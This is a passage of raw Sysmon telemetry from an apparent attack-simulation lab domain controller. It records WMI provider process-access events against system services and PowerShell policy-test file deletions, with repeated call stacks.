4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mc1qtlha.wow.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_o0tylo1e.5rx.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A2AA-00000000AD01}6424C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A2AA-00000000AD01}6424C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.795{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPC